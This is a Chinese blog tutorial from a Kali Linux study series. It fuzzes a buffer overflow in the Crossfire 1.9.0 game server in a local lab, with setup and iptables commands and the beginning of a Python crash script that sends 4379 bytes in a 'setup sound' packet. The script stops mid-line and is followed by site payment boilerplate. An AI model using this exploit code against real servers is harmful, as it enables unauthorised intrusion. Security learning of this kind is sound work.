Kali linux 学习笔记(十九)缓冲区溢出——linux(crossfire) 2020.3.1

本文介绍了在Linux环境下,使用Kali Linux的edb-debug工具对Crossfire游戏1.9.0版本的缓冲区溢出漏洞进行分析和利用的过程。通过模糊测试确定4379个字符导致溢出,找到EIP控制点,并生成Shellcode成功获取远程连接。
摘要由CSDN通过智能技术生成

前言

上一篇在windows下用SLMail的漏洞实现缓冲区溢出
这次在Linux下用crossfire的漏洞实现缓冲区溢出

crossfire穿越火线

  • 多人在线rpg游戏
  • 1.9.0版本接受入站socket连接时存在缓冲区溢出
  • 新版本已经修复

这个漏洞是很早很早以前的
现在拿来学习和练手(笑)

1、实验准备

调试工具:edb-debug(kali自带)
运行平台:kali i486(32位)

crossfire准备
安装要注意路径

mv crossfire.tar.gz /usr/games/
cd /usr/games
tar zxpf crossfire.tar.gz
./crossfire
netstat -pentu #查看端口

本机准备
防止练手过程中,开放的端口被其他人攻击

iptables -A INPUT -p tcp --destination-port 13327 \~ -d 127.0.0.1 -j DROP #严格限制可以访问端口的IP
iptables -A INPUT -p tcp --destination-port 4444 \~ -d 127.0.0.1 -j DROP

调试

edb --run /usr/games/crossfire/bin/crossfire #通过edb调用crossfire

菜单栏debug下点两次run
出现小窗口监视

2、模糊测试

测试缓冲区溢出
根据已知信息
4379个字符刚好发生缓冲区溢出
(这个数据最初怎么得到的令人困惑)

脚本01.py

#!/usr/bin/python
import socket
host="127.0.0.1"
crash="\x41"*4379 #4379个"A",4379个字符刚好缓冲区溢出
buffer="\x11(setup sound "+crash+"\x90\x00#"
s=socket.socket
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值